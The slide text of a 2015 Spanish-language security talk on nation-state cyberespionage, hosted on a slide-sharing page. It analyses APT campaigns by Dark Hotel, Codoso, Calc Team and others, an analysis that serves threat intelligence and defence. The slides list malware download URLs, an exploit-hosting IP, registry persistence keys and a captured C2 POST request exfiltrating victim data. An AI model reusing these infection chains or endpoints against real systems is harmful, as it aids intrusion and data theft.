SlideShare una empresa de Scribd logo
CyberespionajedeNaciones
#PeruHack2015
MauricioVelazco
@mvelazco
#whoami
▪ SecurityGeek(6+anhos)
▪ BlueTeam:GestiondeVulns,RespuestaaIncidentes,
ThreatIntelligence,etc.
▪ ThreatHunting
▪ AlgunasCerts:
OCSP,CEH,CPTE,ECSA
▪ @mvelazco
Cyber Espionaje
▪ Elusodeataquesinformaticosparaobteneraccesoa
informacionconfidencialoconfinesdesabotaje.
▪ Tipicamentellevadoacaboporungobierno;bien
estructuradoyconaccesoarecursos~ilimitados
▪ APT(AdvancedPersistentThreat)
Stuxnet - Agosto 2010
▪ Operacion“OlympicGames”
▪ EEEUeIsrael
▪ Objetivo:afectarelenriquicimientodeUranioenlacentral
nucleardeNatanz,Iran
▪ Exploto4 Zero Days
▪ Limahack2011
APT 1 Report – Febrero 2013
http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
Mayo 2014
Post Snowden
Junio 2013
OPM – Junio 2015
Hacking Team – Julio 2015
Cómo lo hacen ?
The Cyber Kill Chain
Intelligence-Driven Computer Network
Defense Informed by Analysis of Adversary
Campaigns and Intrusion Kill Chains
Lockheed Martin, 2011
RSA - 2011
Analisis Tecnico
Dark Hotel Team
▪ GrupodecyberespionajeconnexosaCoreadelSuractivo
desdeel2010.
▪ Enfocadoencomprometerorganizacionesasociadascon
diplomacia,politicainternacional,seguridad&defensa.
▪ Gobiernosatacadosincluyen:Japon,Taiwan,China,Rusia,
TailandiayUSA.
Dark Hotel Team – TTPs
▪ Correos“SpearPhishing”utilizandotemasdeinterespara
lasvictimas
▪ Hautilizadovulnerabilidades0day
▪ CVE-2014-0497yCVE-2009-4324
▪ Troyanohechoamedida:Tapaoux
▪ MetodosdeInfeccion
▪ BinariosconRight-to-leftoverride(RTLO)
▪ ArchivosHTA
▪ Macrosembebidas
▪ ScriptsJavascript
Dark Hotel Team – TTPs
▪ RTLOesuncaracterUnicode(U+202e)diseñadopara
soportarlenguajesqueseescribendederechaaizquierda.
▪ Estecaracterpuedeserabusadoparahacercreerque
archivosmaliciososnoloson.
Dark Hotel Team – TTPs
Dark Hotel Team – Campanha #1
▪ SpearPhishingconunarchivoraratachadoquecontiene
unbinarioutilizandoRTLO:letter_rcs.jpg.
▪ Alejecutarse,elbinarioescribe:
▪ letter_rcs.jpg–Imageninocua
▪ u.js–ScriptJavascriptmalicioso
▪ EnWindows,pordefecto,abrirunarchivoconextension
.JSinvoca Windowsscriptinghost(WSH). a
wscript.exe
Dark Hotel Team – Campanha #1
Dark Hotel Team – Campanha #1
▪ U.jsdescargayejecutaotroJavscriptde
hxxp://xxx.info/decod9/unzip.js
▪ Unzip.jsdescarga
hxxp://xxx.info/open99/office32loguardaen
%TEMP%csrtsrm.exe yloejecuta(payload)
▪ Eltroyanodescargaotrosmodulosconelfindeexfiltracion
▪ Keylogger
%APPDATA%MicrosoftWindowssystem64srmsr.exe
▪ DocumentScrapping
%APPDATA%MicrosoftWindowssystem64xsrmsd.exe
Dark Hotel Team – Campanha #1
▪ xsrmsd.exeencuentratodoslos.doc, .pdf, .xls, .txty
creaunarchivocomprimidoconpassword
12345qwert!!
▪ Llave:HKEY_LOCAL_MACHINESOFTWAREMicrosoftActiveSetupInstalled
Components{50036903-7717-484a-9345-7AE5FF85DCE9}StubPath
Valor:%WINDIR%system32csntzjy.exe
%APPDATA%MicrosoftWindowsExplorercsntzjy.exe
Dark Hotel Team – Campanha #2
▪ DarkHotelcomprometiolaseguridaddehotelesdelujoy
mantuvoaccesoparaserusadocuandoseanecesario.
▪ Losobjetivossonusualmentealtosejecutivosdedistintas
industriasconinteresesenlaregionasiatica.
▪ Alconectarsealareddelhotel,elobjetivorecibeun
mensajedeactualizaciondeGoogle Toolbar,Adobe
FlashoWindows Messenger.
▪ Kaspersky
Codoso Team
▪ ActivodesdeAbril2011;tienevinculosconChina.
▪ Conduceintrusionesderedcomosoporteparaunesfuerzo
decolecciondeinteligenciaglobal
▪ Verticalesafectadasincluyen
▪ Energia
▪ Finanzas
▪ Defenss
▪ Gobierno
▪ DisidentesPoliticos
Codoso Team - TTPs
▪ SpearPhishingemails
▪ Waterholing
▪ Hanutilizadovulnerabidades0day
▪ Troyanohechoamedida:Mad Hatter/Codoso
▪ Utilizancorreosseñueloscontemasrelacioadosa
problemasconChina,eventosmundialesypolitica
internacional.
Codoso Team – Campanha 1
▪ Ennoviembredel2014,Codosoinfectolaconocidaweb
forbes.com einyectouniframemalicioso:
http://74.207.254.87/83a08vkzvt/8hthrx.swf
▪ Elobjectivo:explotar2vulnerabilidades0dayenFlash
Player(CVE-2014-9163)eInternetExplorer9+
(CVE-2015-0071)
▪ SiesXPsoloseutilizaCVE-2014-9163,perosies
Vista+exploitatambienIEparabypasseasASLR
Codoso Team – Campanha 1
▪ Checks
Codoso Team – Campanha 1
▪ ElexploitdescargaunaDLL(wuservice.dll)ylacarga
en memoria.
▪ EstaDLLenumeraelequipoejecutandocomandosde
reconocimiento:systeminfo, ipconfig, tasklist.
▪ EnvialainformacionrecaudadaenelVIEWSTATEbase
64
▪ UnasegundaDLLcifradaconXOR(0x67)esdescargadae
inyectadaenmemoria.
Calc Team
▪ Activodesdeel2009,grupodeespionajeconnexosa
China.
▪ HistoricamentesusobjetivoshansidoTaiwanyUSAconel
finderecolectarinteligencia.
▪ Tecnicapreferida:Correoselectronicos+ingenieriasocial
utilizandosiempretemasdegeopolitica.
▪ Explotovulnerabilidadesyaparchadas
▪ Utiliza3“familias”demalware
Calc Team – Campanha 1
▪ Spearphishing,“G20 Briefing Paper.zip” que
contiene2binariosmaliciosos(.exe)
▪ G20DiscussionPaper.exe
▪ GPFIWorkPlan2013.exe
▪ LosbinariosescribenyabrenunarchivoPDFlegitimocon
elvisorpordefecto.
▪ Secopiaa%TEMP%, ycreaunallavederegistropara
serejecutadocuandoelequipoinicia (KeyLoggery
dropper)
▪ Alcopiarse,seejecutaconelparametro“again”ycontacta
astatus.acmetoy.com
Calc Team – Campanha 1
Calc Team – Campanha 1
Calc Team – Campanha 2
▪ Noviembre2015,APEC
▪ BriefingPaperonthePresident'sScheduleduringtheAPEC
LeadersMeeting.zip
▪ Hojadecalculo(.xls)conunmacroobfuscadoembebido.
▪ Escribe
▪ %TEMP%AELMEntertainmentbudgetandAttendanceallowance.xls
▪ %TEMP%1C234643A8A8.tmp–Scriptdelimpieza
▪ %TEMP%1C224643A8B8.js –MalwareenJS
▪ HKCUSoftwareMicrosoftWindowsCurrentVersionRun
network
Calc Team – Campanha 2
Calc Team – Campanha 2
Calc Team – Campanha 2
Calc Team – Campanha 2
▪ POST/common.phpHTTP/1.1
Content-Type:application/x-www-form-urlencoded
User-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1;
Trident/5.0)
Referer:https://www.google.com
Content-Length:248
Accept:*/*
Host:presentation.twilightXXXXXX.com
Connection:Keep-Alive
action=aaa&data=NzQzMDFjYzNjOWVmOTBiNDIzZDdiNDI
0ZDI2NDNiMGZ8MTcyLjE2LjI1NS4yfFdJTFNPTk5FTEx
ZfFdJTFNPTk5FTExZXEFkbWluaXN0cmF0b3IoYWRta
W5pc3RyYXRvcil8TWljcm9zb2Z0IFdpbmRvd3MgWF
AgUHJvZmVzc2lvbmFsfDE3Mi4xNi4yNTUuMTo4ODg
4fGpzbmVbMS40XSxpbXB0LHByfA%3D%3D
Winnti Team
▪ Identificadoen2009
▪ Susataqueshansidoenfocadosalaindustriadejuegos
primariamentepararobarcertificadosdigitalesque
permitansoportenactividadesdecyberespionajeaotros
objetivos.
▪ Nexosconotrosgruposdeespionajeconloscuales
compartecertificadosdigitales
X Team
X Team
X Team
X Team
X Team
Conclusiones
▪ AdvancedPersistentThreat?
▪ ElCyberEsiponajecontinuaraimplementandocuanta
tecnicapuedasiempreycuandoseaefectiva
▪ Gruposdeespionajeorientalesutilizanlainformacion
recaudaparafortacelersuindustriainernamientrasque
occidentetieneotrosfines.
▪ Sudamerica?Peru?
CyberespionajedeNaciones
#PeruHack2015
MauricioVelazco
@mvelazco

Más contenido relacionado

Más de Mauricio Velazco

PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
Mauricio Velazco
 
Detection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdfDetection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdf
Mauricio Velazco
 
BSides Panama 2022
BSides Panama 2022BSides Panama 2022
BSides Panama 2022
Mauricio Velazco
 
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack SimulationsBlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
Mauricio Velazco
 
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary SimulationDefcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Mauricio Velazco
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
Mauricio Velazco
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Mauricio Velazco
 
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue TeamBlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
Mauricio Velazco
 
Bsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementBsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral Movement
Mauricio Velazco
 
LimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuroLimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuro
Mauricio Velazco
 
PeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos WindowsPeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos Windows
Mauricio Velazco
 
Limahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxLimahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/Linux
Mauricio Velazco
 
Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?
Mauricio Velazco
 
Bsides Latam 2019
Bsides Latam 2019Bsides Latam 2019
Bsides Latam 2019
Mauricio Velazco
 
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
Mauricio Velazco
 
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
Mauricio Velazco
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
Mauricio Velazco
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Mauricio Velazco
 
Bsides Long Island 2019
Bsides Long Island 2019Bsides Long Island 2019
Bsides Long Island 2019
Mauricio Velazco
 
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Mauricio Velazco
 

Más de Mauricio Velazco (20)

PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
 
Detection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdfDetection-as-Code: Test Driven Detection Development.pdf
Detection-as-Code: Test Driven Detection Development.pdf
 
BSides Panama 2022
BSides Panama 2022BSides Panama 2022
BSides Panama 2022
 
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack SimulationsBlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
 
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary SimulationDefcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
 
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue TeamBlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
BlackHat 2020 Arsenal - PurpleSharp: Adversary Simulation for the Blue Team
 
Bsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementBsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral Movement
 
LimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuroLimaHack 2011 - Stuxnet : El arma del futuro
LimaHack 2011 - Stuxnet : El arma del futuro
 
PeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos WindowsPeruHack 2014 - Post Explotacion en Entornos Windows
PeruHack 2014 - Post Explotacion en Entornos Windows
 
Limahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxLimahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/Linux
 
Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?Limahack 2009 - SSL no esta roto ... o si ?
Limahack 2009 - SSL no esta roto ... o si ?
 
Bsides Latam 2019
Bsides Latam 2019Bsides Latam 2019
Bsides Latam 2019
 
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
ATT&CKcon 2.0 2019 - Tracking and measuring your ATT&CK coverage with ATT&CK2...
 
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
 
Bsides Long Island 2019
Bsides Long Island 2019Bsides Long Island 2019
Bsides Long Island 2019
 
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
 

Último

HERRAMIENTAS WEB--------------------.pptx
HERRAMIENTAS WEB--------------------.pptxHERRAMIENTAS WEB--------------------.pptx
HERRAMIENTAS WEB--------------------.pptx
maralache30
 
maestria-motores-combustion-interna-alternativos (1).pdf
maestria-motores-combustion-interna-alternativos (1).pdfmaestria-motores-combustion-interna-alternativos (1).pdf
maestria-motores-combustion-interna-alternativos (1).pdf
JimmyTejadaSalizar
 
Informació Projecte Iniciativa TIC SOPRA STERIA.pdf
Informació Projecte Iniciativa TIC SOPRA STERIA.pdfInformació Projecte Iniciativa TIC SOPRA STERIA.pdf
Informació Projecte Iniciativa TIC SOPRA STERIA.pdf
Festibity
 
Catalogo Buzones BTV Amado Salvador Distribuidor Oficial Valencia
Catalogo Buzones BTV Amado Salvador Distribuidor Oficial ValenciaCatalogo Buzones BTV Amado Salvador Distribuidor Oficial Valencia
Catalogo Buzones BTV Amado Salvador Distribuidor Oficial Valencia
AMADO SALVADOR
 
trabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6ftrabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6f
zoecaicedosalazar
 
COMPARATIVO DE SUBESTACIONES AIS VS GIS.
COMPARATIVO DE SUBESTACIONES AIS VS GIS.COMPARATIVO DE SUBESTACIONES AIS VS GIS.
COMPARATIVO DE SUBESTACIONES AIS VS GIS.
SERVANDOBADILLOPOLEN
 
modelosdeteclados-230114024527-aa2c9553.pptx
modelosdeteclados-230114024527-aa2c9553.pptxmodelosdeteclados-230114024527-aa2c9553.pptx
modelosdeteclados-230114024527-aa2c9553.pptx
evelinglilibethpeafi
 
Estructuras básicas_ conceptos de programación (1).docx
Estructuras básicas_ conceptos de programación  (1).docxEstructuras básicas_ conceptos de programación  (1).docx
Estructuras básicas_ conceptos de programación (1).docx
SamuelRamirez83524
 
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
sarasofiamontezuma
 
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfTRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
thomasdcroz38
 
Refrigeradores Samsung Modo Test y Forzado
Refrigeradores Samsung Modo Test y ForzadoRefrigeradores Samsung Modo Test y Forzado
Refrigeradores Samsung Modo Test y Forzado
NicandroMartinez2
 
computacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADOcomputacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADO
YaniEscobar2
 
algebra de boole teoria.pdf texto guia.1
algebra de boole teoria.pdf texto guia.1algebra de boole teoria.pdf texto guia.1
algebra de boole teoria.pdf texto guia.1
yuki22434
 
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTALINFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
CrystalRomero18
 
Informe DATA & IA 2024 Primera encuesta sobre el uso de IA en las empresas pe...
Informe DATA & IA 2024 Primera encuesta sobre el uso de IA en las empresas pe...Informe DATA & IA 2024 Primera encuesta sobre el uso de IA en las empresas pe...
Informe DATA & IA 2024 Primera encuesta sobre el uso de IA en las empresas pe...
alejandromanuelve
 
absorcion de gases y practicas de laboratorios
absorcion de gases y practicas de laboratoriosabsorcion de gases y practicas de laboratorios
absorcion de gases y practicas de laboratorios
JuanAlvarez413513
 
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
marianabz2403
 
Catalogo Refrigeracion Miele Distribuidor Oficial Amado Salvador Valencia
Catalogo Refrigeracion Miele Distribuidor Oficial Amado Salvador ValenciaCatalogo Refrigeracion Miele Distribuidor Oficial Amado Salvador Valencia
Catalogo Refrigeracion Miele Distribuidor Oficial Amado Salvador Valencia
AMADO SALVADOR
 
Catalogo Cajas Fuertes BTV Amado Salvador Distribuidor Oficial
Catalogo Cajas Fuertes BTV Amado Salvador Distribuidor OficialCatalogo Cajas Fuertes BTV Amado Salvador Distribuidor Oficial
Catalogo Cajas Fuertes BTV Amado Salvador Distribuidor Oficial
AMADO SALVADOR
 
Estructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdfEstructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdf
cristianrb0324
 

Último (20)

HERRAMIENTAS WEB--------------------.pptx
HERRAMIENTAS WEB--------------------.pptxHERRAMIENTAS WEB--------------------.pptx
HERRAMIENTAS WEB--------------------.pptx
 
maestria-motores-combustion-interna-alternativos (1).pdf
maestria-motores-combustion-interna-alternativos (1).pdfmaestria-motores-combustion-interna-alternativos (1).pdf
maestria-motores-combustion-interna-alternativos (1).pdf
 
Informació Projecte Iniciativa TIC SOPRA STERIA.pdf
Informació Projecte Iniciativa TIC SOPRA STERIA.pdfInformació Projecte Iniciativa TIC SOPRA STERIA.pdf
Informació Projecte Iniciativa TIC SOPRA STERIA.pdf
 
Catalogo Buzones BTV Amado Salvador Distribuidor Oficial Valencia
Catalogo Buzones BTV Amado Salvador Distribuidor Oficial ValenciaCatalogo Buzones BTV Amado Salvador Distribuidor Oficial Valencia
Catalogo Buzones BTV Amado Salvador Distribuidor Oficial Valencia
 
trabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6ftrabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6f
 
COMPARATIVO DE SUBESTACIONES AIS VS GIS.
COMPARATIVO DE SUBESTACIONES AIS VS GIS.COMPARATIVO DE SUBESTACIONES AIS VS GIS.
COMPARATIVO DE SUBESTACIONES AIS VS GIS.
 
modelosdeteclados-230114024527-aa2c9553.pptx
modelosdeteclados-230114024527-aa2c9553.pptxmodelosdeteclados-230114024527-aa2c9553.pptx
modelosdeteclados-230114024527-aa2c9553.pptx
 
Estructuras básicas_ conceptos de programación (1).docx
Estructuras básicas_ conceptos de programación  (1).docxEstructuras básicas_ conceptos de programación  (1).docx
Estructuras básicas_ conceptos de programación (1).docx
 
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
 
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfTRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
 
Refrigeradores Samsung Modo Test y Forzado
Refrigeradores Samsung Modo Test y ForzadoRefrigeradores Samsung Modo Test y Forzado
Refrigeradores Samsung Modo Test y Forzado
 
computacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADOcomputacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADO
 
algebra de boole teoria.pdf texto guia.1
algebra de boole teoria.pdf texto guia.1algebra de boole teoria.pdf texto guia.1
algebra de boole teoria.pdf texto guia.1
 
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTALINFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
INFORME DE LAS FICHAS.docx.pdf LICEO DEPARTAMENTAL
 
Informe DATA & IA 2024 Primera encuesta sobre el uso de IA en las empresas pe...
Informe DATA & IA 2024 Primera encuesta sobre el uso de IA en las empresas pe...Informe DATA & IA 2024 Primera encuesta sobre el uso de IA en las empresas pe...
Informe DATA & IA 2024 Primera encuesta sobre el uso de IA en las empresas pe...
 
absorcion de gases y practicas de laboratorios
absorcion de gases y practicas de laboratoriosabsorcion de gases y practicas de laboratorios
absorcion de gases y practicas de laboratorios
 
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
 
Catalogo Refrigeracion Miele Distribuidor Oficial Amado Salvador Valencia
Catalogo Refrigeracion Miele Distribuidor Oficial Amado Salvador ValenciaCatalogo Refrigeracion Miele Distribuidor Oficial Amado Salvador Valencia
Catalogo Refrigeracion Miele Distribuidor Oficial Amado Salvador Valencia
 
Catalogo Cajas Fuertes BTV Amado Salvador Distribuidor Oficial
Catalogo Cajas Fuertes BTV Amado Salvador Distribuidor OficialCatalogo Cajas Fuertes BTV Amado Salvador Distribuidor Oficial
Catalogo Cajas Fuertes BTV Amado Salvador Distribuidor Oficial
 
Estructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdfEstructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdf
 

Peruhack 2015 - Cyberespionaje de Naciones

  • 3. Cyber Espionaje ▪ Elusodeataquesinformaticosparaobteneraccesoa informacionconfidencialoconfinesdesabotaje. ▪ Tipicamentellevadoacaboporungobierno;bien estructuradoyconaccesoarecursos~ilimitados ▪ APT(AdvancedPersistentThreat)
  • 4. Stuxnet - Agosto 2010 ▪ Operacion“OlympicGames” ▪ EEEUeIsrael ▪ Objetivo:afectarelenriquicimientodeUranioenlacentral nucleardeNatanz,Iran ▪ Exploto4 Zero Days ▪ Limahack2011
  • 5. APT 1 Report – Febrero 2013 http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
  • 9. Hacking Team – Julio 2015
  • 11. The Cyber Kill Chain Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains Lockheed Martin, 2011
  • 14. Dark Hotel Team ▪ GrupodecyberespionajeconnexosaCoreadelSuractivo desdeel2010. ▪ Enfocadoencomprometerorganizacionesasociadascon diplomacia,politicainternacional,seguridad&defensa. ▪ Gobiernosatacadosincluyen:Japon,Taiwan,China,Rusia, TailandiayUSA.
  • 15. Dark Hotel Team – TTPs ▪ Correos“SpearPhishing”utilizandotemasdeinterespara lasvictimas ▪ Hautilizadovulnerabilidades0day ▪ CVE-2014-0497yCVE-2009-4324 ▪ Troyanohechoamedida:Tapaoux ▪ MetodosdeInfeccion ▪ BinariosconRight-to-leftoverride(RTLO) ▪ ArchivosHTA ▪ Macrosembebidas ▪ ScriptsJavascript
  • 16. Dark Hotel Team – TTPs ▪ RTLOesuncaracterUnicode(U+202e)diseñadopara soportarlenguajesqueseescribendederechaaizquierda. ▪ Estecaracterpuedeserabusadoparahacercreerque archivosmaliciososnoloson.
  • 17. Dark Hotel Team – TTPs
  • 18. Dark Hotel Team – Campanha #1 ▪ SpearPhishingconunarchivoraratachadoquecontiene unbinarioutilizandoRTLO:letter_rcs.jpg. ▪ Alejecutarse,elbinarioescribe: ▪ letter_rcs.jpg–Imageninocua ▪ u.js–ScriptJavascriptmalicioso ▪ EnWindows,pordefecto,abrirunarchivoconextension .JSinvoca Windowsscriptinghost(WSH). a wscript.exe
  • 19. Dark Hotel Team – Campanha #1
  • 20. Dark Hotel Team – Campanha #1 ▪ U.jsdescargayejecutaotroJavscriptde hxxp://xxx.info/decod9/unzip.js ▪ Unzip.jsdescarga hxxp://xxx.info/open99/office32loguardaen %TEMP%csrtsrm.exe yloejecuta(payload) ▪ Eltroyanodescargaotrosmodulosconelfindeexfiltracion ▪ Keylogger %APPDATA%MicrosoftWindowssystem64srmsr.exe ▪ DocumentScrapping %APPDATA%MicrosoftWindowssystem64xsrmsd.exe
